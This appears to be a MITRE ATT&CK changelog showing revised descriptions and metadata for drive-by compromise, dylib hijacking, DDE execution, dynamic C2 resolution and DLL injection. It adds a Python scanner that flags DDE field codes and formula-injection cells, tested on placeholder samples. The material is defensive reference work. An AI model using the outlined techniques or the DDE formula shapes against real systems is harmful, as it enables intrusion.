Multiple ways of delivering exploit code to a browser exist, including: * A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting. * Malicious ads are paid for and served through legitimate ad providers. * Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content). Often the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is often referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise) Typical drive-by compromise process: 1. A user visits a website that is used to host the adversary controlled content. 2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes. 3. Upon finding a vulnerable version, exploit code is delivered to the browser. 4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place. * In some cases a second visit to the website after the initial scan is required before exploit code is delivered. Unlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ. Adversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.(Citation: Volexity OceanLotus Nov 2017) |
| x_mitre_data_sources[0] | File: File Creation | Network Traffic: Network Connection Creation |
| x_mitre_data_sources[1] | Process: Process Creation | Network Traffic: Network Traffic Content |
| x_mitre_data_sources[2] | Network Traffic: Network Connection Creation | File: File Creation |
| x_mitre_data_sources[3] | Network Traffic: Network Traffic Content | Process: Process Creation |
| x_mitre_version | 1.3 | 1.4 |
| Old Description | New Description |
|---|---|
| Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). In such cases, the user's web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Prior to [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Adversaries may upload or inject malicious web content, such as [JavaScript](https://attack.mitre.org/techniques/T1059/007), into websites.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015) This may be done in a number of ways, including inserting malicious script into web pages or other user controllable web content such as forum posts. Adversaries may also craft malicious web advertisements and purchase ad space on a website through legitimate ad providers. In addition to staging content to exploit a user's web browser, adversaries may also stage scripting content to profile the user's browser (as in [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592)) to ensure it is vulnerable prior to attempting exploitation.(Citation: ATT ScanBox) Websites compromised by an adversary and used to stage a drive-by may be ones visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted attack is referred to a strategic web compromise or watering hole attack. Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). | Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). In such cases, the user's web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Prior to [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Adversaries may upload or inject malicious web content, such as [JavaScript](https://attack.mitre.org/techniques/T1059/007), into websites.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015) This may be done in a number of ways, including inserting malicious script into web pages or other user controllable web content such as forum posts. Adversaries may also craft malicious web advertisements and purchase ad space on a website through legitimate ad providers. In addition to staging content to exploit a user's web browser, adversaries may also stage scripting content to profile the user's browser (as in [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592)) to ensure it is vulnerable prior to attempting exploitation.(Citation: ATT ScanBox) Websites compromised by an adversary and used to stage a drive-by may be ones visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is referred to a strategic web compromise or watering hole attack. Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-17 16:27:38.793000+00:00 | 2022-03-08 21:59:57.082000+00:00 |
| description | Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). In such cases, the user's web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Prior to [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Adversaries may upload or inject malicious web content, such as [JavaScript](https://attack.mitre.org/techniques/T1059/007), into websites.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015) This may be done in a number of ways, including inserting malicious script into web pages or other user controllable web content such as forum posts. Adversaries may also craft malicious web advertisements and purchase ad space on a website through legitimate ad providers. In addition to staging content to exploit a user's web browser, adversaries may also stage scripting content to profile the user's browser (as in [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592)) to ensure it is vulnerable prior to attempting exploitation.(Citation: ATT ScanBox) Websites compromised by an adversary and used to stage a drive-by may be ones visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted attack is referred to a strategic web compromise or watering hole attack. Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). | Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). In such cases, the user's web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Prior to [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Adversaries may upload or inject malicious web content, such as [JavaScript](https://attack.mitre.org/techniques/T1059/007), into websites.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015) This may be done in a number of ways, including inserting malicious script into web pages or other user controllable web content such as forum posts. Adversaries may also craft malicious web advertisements and purchase ad space on a website through legitimate ad providers. In addition to staging content to exploit a user's web browser, adversaries may also stage scripting content to profile the user's browser (as in [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592)) to ensure it is vulnerable prior to attempting exploitation.(Citation: ATT ScanBox) Websites compromised by an adversary and used to stage a drive-by may be ones visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is referred to a strategic web compromise or watering hole attack. Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). |
| x_mitre_version | 1.1 | 1.2 |
| Description |
|---|
Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
Adversaries may gain execution by inserting malicious dylibs with the name of the missing dylib in the identified path.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: Wardle Dylib Hijacking OSX 2015)(Citation: Github EmpireProject HijackScanner)(Citation: Github EmpireProject CreateHijacker Dylib) Dylibs are loaded into an application's address space allowing the malicious dylib to inherit the application's privilege level and resources. Based on the application, this could result in privilege escalation and uninhibited network access. This method may also evade detection from security products since the execution is masked under a legitimate process.(Citation: Writing Bad Malware for OSX)(Citation: wardle artofmalware volume1)(Citation: MalwareUnicorn macOS Dylib Injection MachO) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Amanda Rousseau. (2020, April 4). MacOS Dylib Injection Workshop. Retrieved March 29, 2021. | |
| external_references | CAPEC-471 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-471 | |
| external_references | Apple Inc.. (2012, July 7). Run-Path Dependent Libraries. Retrieved March 31, 2021. |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-27 20:19:15.212000+00:00 | 2022-05-05 04:08:30.203000+00:00 |
| external_references[1]['source_name'] | capec | MalwareUnicorn macOS Dylib Injection MachO |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/471.html | https://malwareunicorn.org/workshops/macos_dylib_injection.html#5 |
| external_references[2]['source_name'] | Wardle Dylib Hijack Vulnerable Apps | Apple Developer Doco Archive Run-Path |
| external_references[2]['description'] | Patrick Wardle. (2019, July 2). Getting Root with Benign AppStore Apps. Retrieved March 31, 2021. | Apple Inc.. (2012, July 7). Run-Path Dependent Libraries. Retrieved March 31, 2021. |
| external_references[2]['url'] | https://objective-see.com/blog/blog_0x46.html | https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/RunpathDependentLibraries.html |
| external_references[4]['source_name'] | Github EmpireProject HijackScanner | Writing Bad Malware for OSX |
| external_references[4]['description'] | Wardle, P., Ross, C. (2017, September 21). Empire Project Dylib Hijack Vulnerability Scanner. Retrieved April 1, 2021. | Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved July 10, 2017. |
| external_references[4]['url'] | https://github.com/EmpireProject/Empire/blob/master/lib/modules/python/situational_awareness/host/osx/HijackScanner.py | https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf |
| external_references[5]['source_name'] | Github EmpireProject CreateHijacker Dylib | Wardle Dylib Hijack Vulnerable Apps |
| external_references[5]['description'] | Wardle, P., Ross, C. (2018, April 8). EmpireProject Create Dylib Hijacker. Retrieved April 1, 2021. | Patrick Wardle. (2019, July 2). Getting Root with Benign AppStore Apps. Retrieved March 31, 2021. |
| external_references[5]['url'] | https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py | https://objective-see.com/blog/blog_0x46.html |
| external_references[6]['source_name'] | Writing Bad Malware for OSX | wardle artofmalware volume1 |
| external_references[6]['description'] | Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved July 10, 2017. | Patrick Wardle. (2020, August 5). The Art of Mac Malware Volume 0x1: Analysis. Retrieved March 19, 2021. |
| external_references[6]['url'] | https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf | https://taomm.org/vol1/pdfs.html |
| external_references[7]['source_name'] | wardle artofmalware volume1 | Github EmpireProject HijackScanner |
| external_references[7]['description'] | Patrick Wardle. (2020, August 5). The Art of Mac Malware Volume 0x1: Analysis. Retrieved March 19, 2021. | Wardle, P., Ross, C. (2017, September 21). Empire Project Dylib Hijack Vulnerability Scanner. Retrieved April 1, 2021. |
| external_references[7]['url'] | https://taomm.org/vol1/pdfs.html | https://github.com/EmpireProject/Empire/blob/master/lib/modules/python/situational_awareness/host/osx/HijackScanner.py |
| external_references[8]['source_name'] | MalwareUnicorn macOS Dylib Injection MachO | Github EmpireProject CreateHijacker Dylib |
| external_references[8]['description'] | Amanda Rousseau. (2020, April 4). MacOS Dylib Injection Workshop. Retrieved March 29, 2021. | Wardle, P., Ross, C. (2018, April 8). EmpireProject Create Dylib Hijacker. Retrieved April 1, 2021. |
| external_references[8]['url'] | https://malwareunicorn.org/workshops/macos_dylib_injection.html#5 | https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py |
| external_references[9]['source_name'] | Apple Developer Doco Archive Run-Path | capec |
| external_references[9]['url'] | https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/RunpathDependentLibraries.html | https://capec.mitre.org/data/definitions/471.html |
| x_mitre_data_sources[0] | File: File Creation | File: File Modification |
| x_mitre_data_sources[1] | File: File Modification | File: File Creation |
| x_mitre_defense_bypassed[0] | Application control | Application Control |
| Old Description | New Description |
|---|---|
| Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution. Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by [Component Object Model](https://attack.mitre.org/techniques/T1559/001), DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys. (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advisory Nov 2017) Microsoft Office documents can be poisoned with DDE commands (Citation: SensePost PS DDE May 2016) (Citation: Kettle CSV DDE Aug 2014), directly or through embedded files (Citation: Enigma Reviving DDE Jan 2018), and used to deliver execution via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. (Citation: SensePost MacroLess DDE Oct 2017) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). DDE execution can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019) | Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution. Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by [Component Object Model](https://attack.mitre.org/techniques/T1559/001), DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys.(Citation: BleepingComputer DDE Disabled in Word Dec 2017)(Citation: Microsoft ADV170021 Dec 2017)(Citation: Microsoft DDE Advisory Nov 2017) Microsoft Office documents can be poisoned with DDE commands, directly or through embedded files, and used to deliver execution via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros.(Citation: SensePost PS DDE May 2016)(Citation: Kettle CSV DDE Aug 2014)(Citation: Enigma Reviving DDE Jan 2018)(Citation: SensePost MacroLess DDE Oct 2017) Similarly, adversaries may infect payloads to execute applications and/or commands on a victim device by way of embedding DDE formulas within a CSV file intended to be opened through a Windows spreadsheet program.(Citation: OWASP CSV Injection)(Citation: CSV Excel Macro Injection ) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). DDE execution can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-07-26 22:52:04.196000+00:00 | 2022-02-22 13:22:30.191000+00:00 |
| external_references[8]['source_name'] | Fireeye Hunting COM June 2019 | OWASP CSV Injection |
| external_references[8]['description'] | Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June 10, 2019. | Albinowax Timo Goosen. (n.d.). CSV Injection. Retrieved February 7, 2022. |
| external_references[8]['url'] | https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html | https://owasp.org/www-community/attacks/CSV_Injection |
| external_references[9]['source_name'] | NVisio Labs DDE Detection Oct 2017 | CSV Excel Macro Injection |
| external_references[9]['description'] | NVISO Labs. (2017, October 11). Detecting DDE in MS Office documents. Retrieved November 21, 2017. | Ishaq Mohammed . (2021, January 10). Everything about CSV Injection and CSV Excel Macro Injection. Retrieved February 7, 2022. |
| external_references[9]['url'] | https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/ | https://blog.securelayer7.net/how-to-perform-csv-excel-macro-injection/ |
| x_mitre_detection | Monitor processes for abnormal behavior indicative of DDE abuse, such as Microsoft Office applications loading DLLs and other modules not typically associated with the application or these applications spawning unusual processes (such as cmd.exe). OLE and Office Open XML files can be scanned for ‘DDEAUTO’, ‘DDE’, and other strings indicative of DDE execution.(Citation: NVisio Labs DDE Detection Oct 2017) | Monitor processes for abnormal behavior indicative of DDE abuse, such as Microsoft Office applications loading DLLs and other modules not typically associated with the application or these applications spawning unusual processes (such as cmd.exe). OLE, Office Open XML, CSV, and other files can be scanned for ‘DDEAUTO’, ‘DDE’, and other strings indicative of DDE execution.(Citation: NVisio Labs DDE Detection Oct 2017)(Citation: OWASP CSV Injection)(Citation: CSV Excel Macro Injection ) |
| x_mitre_version | 1.1 | 1.2 |
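The detection guidance in the table above (scan OLE, Office Open XML and CSV files for DDEAUTO/DDE strings) worked through as an added Python example; this is not code from the ATT&CK record or from any cited project, and every sample file is constructed inline. The OLE branch is a raw byte heuristic (it does not parse the compound file's streams), and the CSV branch also flags the Excel DDE formula shape `=application|topic!item`.

```python
import csv
import io
import re
import zipfile

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # Compound File Binary header
ZIP_MAGIC = b"PK\x03\x04"                          # OOXML is a zip container
# Word field codes 'DDEAUTO ...' and 'DDE ...'
DDE_FIELD_RE = re.compile(r"\bDDE(?:AUTO)?\b", re.IGNORECASE)
# Excel DDE formula syntax: =application|topic!item
DDE_FORMULA_RE = re.compile(r"^[=+\-@].*\|.*!")
FORMULA_LEAD = ("=", "+", "-", "@", "\t", "\r")
# WordprocessingML field instructions: <w:instrText>..</w:instrText> or w:fldSimple w:instr="..."
INSTR_RE = re.compile(r'<w:instrText[^>]*>(.*?)</w:instrText>|w:instr="([^"]*)"', re.S)


def scan_ooxml(data: bytes) -> list[str]:
    """Walk the XML parts of an OOXML container for DDE field codes or ddeLink parts."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith((".xml", ".rels")):
                continue
            text = zf.read(name).decode("utf-8", errors="replace")
            for m in INSTR_RE.finditer(text):
                instr = (m.group(1) or m.group(2) or "").strip()
                if DDE_FIELD_RE.search(instr):
                    hits.append(f"{name}: DDE field code {instr[:40]!r}")
            if "<ddeLink" in text:   # SpreadsheetML externalLink part
                hits.append(f"{name}: ddeLink element")
    return hits


def _looks_numeric(cell: str) -> bool:
    body = cell.lstrip("+-").replace(".", "", 1).replace(",", "")
    return body.isdigit()


def scan_csv(data: bytes) -> list[str]:
    """Flag cells a spreadsheet would evaluate as formulas; single out DDE shapes."""
    hits = []
    reader = csv.reader(io.StringIO(data.decode("utf-8", errors="replace")))
    for r, row in enumerate(reader, 1):
        for c, cell in enumerate(row, 1):
            if not cell.startswith(FORMULA_LEAD) or _looks_numeric(cell):
                continue  # plain text or a signed number such as -42.50
            if DDE_FORMULA_RE.search(cell) or DDE_FIELD_RE.search(cell):
                hits.append(f"row {r} col {c}: DDE formula {cell[:40]!r}")
            else:
                hits.append(f"row {r} col {c}: formula-leading cell {cell[:40]!r}")
    return hits


def scan_ole(data: bytes) -> list[str]:
    """Raw search for the field keywords in both 8-bit and UTF-16LE encodings."""
    hits = []
    for needle in (b"DDEAUTO", "DDEAUTO".encode("utf-16-le"),
                   b"DDE ", "DDE ".encode("utf-16-le")):
        off = data.find(needle)
        if off != -1:
            hits.append(f"raw match {needle!r} at offset {off}")
    return hits


def scan_for_dde(data: bytes, filename: str) -> list[str]:
    """Dispatch on container magic first, then on extension for text formats."""
    if data.startswith(ZIP_MAGIC):
        return scan_ooxml(data)
    if data.startswith(OLE_MAGIC):
        return scan_ole(data)
    if filename.lower().endswith((".csv", ".tsv", ".txt")):
        return scan_csv(data)
    return []


def build_docx(instr: str) -> bytes:
    """Construct a minimal OOXML container holding one field code (sample input, not a full docx)."""
    doc = ('<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
           f'<w:body><w:p><w:r><w:instrText xml:space="preserve"> {instr} </w:instrText>'
           '</w:r></w:p></w:body></w:document>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", doc)
    return buf.getvalue()


# Constructed samples: placeholders stand in for any real program or DDE server name
SAMPLE_DDE_DOCX = build_docx('DDEAUTO "placeholder_program" "placeholder_args"')
SAMPLE_CLEAN_DOCX = build_docx('DATE \\@ "yyyy-MM-dd"')
SAMPLE_CSV = (b"name,balance,note\n"
              b"alice,-42.50,hello\n"
              b"bob,7,=SUM(B2:B3)\n"
              b'carol,1,"=placeholder_app|placeholder_topic!placeholder_item"\n')
SAMPLE_OLE = OLE_MAGIC + b"\x00" * 64 + "DDEAUTO".encode("utf-16-le") + b"\x00" * 16

if __name__ == "__main__":
    for fname, blob in (("a.docx", SAMPLE_DDE_DOCX), ("b.docx", SAMPLE_CLEAN_DOCX),
                        ("c.csv", SAMPLE_CSV), ("d.doc", SAMPLE_OLE)):
        print(fname, scan_for_dde(blob, fname) or "clean")
```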
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Fireeye Hunting COM June 2019', 'description': 'Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June 10, 2019.', 'url': 'https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html'} | |
| external_references | {'source_name': 'NVisio Labs DDE Detection Oct 2017', 'description': 'NVISO Labs. (2017, October 11). Detecting DDE in MS Office documents. Retrieved November 21, 2017.', 'url': 'https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/'} | |
| x_mitre_data_sources | Script: Script Execution |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Script: Script Execution |
| Description |
|---|
| Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control. Adversaries may use dynamic resolution for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-10-02 01:37:39.938000+00:00 | 2022-03-11 18:26:23.782000+00:00 |
| Old Description | New Description |
|---|---|
| Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process. DLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread (which calls the LoadLibrary API responsible for loading the DLL). (Citation: Elastic Process Injection July 2017) Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually performing the function of LoadLibrary).(Citation: Elastic HuntingNMemory June 2017)(Citation: Elastic Process Injection July 2017) Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process. | Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process. DLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread (which calls the LoadLibrary API responsible for loading the DLL). (Citation: Elastic Process Injection July 2017) Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually performing the function of LoadLibrary).(Citation: Elastic HuntingNMemory June 2017)(Citation: Elastic Process Injection July 2017) Another variation of this method, often referred to as Module Stomping/Overloading or DLL Hollowing, may be leveraged to conceal injected code within a process. This method involves loading a legitimate DLL into a remote process then manually overwriting the module's AddressOfEntryPoint before starting a new thread in the target process.(Citation: Module Stomping for Shellcode Injection) This variation allows attackers to hide malicious injected code by potentially backing its execution with a legitimate DLL file on disk.(Citation: Hiding Malicious Code with Module Stomping) Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process. |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Boominathan Sundaram'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-18 12:20:00.382000+00:00 | 2022-10-18 21:07:23.748000+00:00 |
| external_references[1]['source_name'] | Elastic Process Injection July 2017 | Hiding Malicious Code with Module Stomping |
| external_references[1]['description'] | Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017. | Aliz Hammond. (2019, August 15). Hiding Malicious Code with "Module Stomping": Part 1. Retrieved July 14, 2022. |
| external_references[1]['url'] | https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process | https://blog.f-secure.com/hiding-malicious-code-with-module-stomping/ |
| x_mitre_data_sources[0] | Process: Process Modification | Process: Process Metadata |
| x_mitre_data_sources[1] | Module: Module Load | Process: OS API Execution |
| x_mitre_data_sources[2] | Process: OS API Execution | Process: Process Access |
| x_mitre_data_sources[3] | Process: Process Access | Process: Process Modification |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Elastic Process Injection July 2017', 'description': 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.', 'url': 'https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process'} | |
| external_references | {'source_name': 'Module Stomping for Shellcode Injection', 'description': 'Red Teaming Experiments. (n.d.). Module Stomping for Shellcode Injection. Retrieved July 14, 2022.', 'url': 'https://www.ired.team/offensive-security/code-injection-process-injection/modulestomping-dll-hollowing-shellcode-injection'} | |
| x_mitre_data_sources | Module: Module Load |
| Description |
|---|
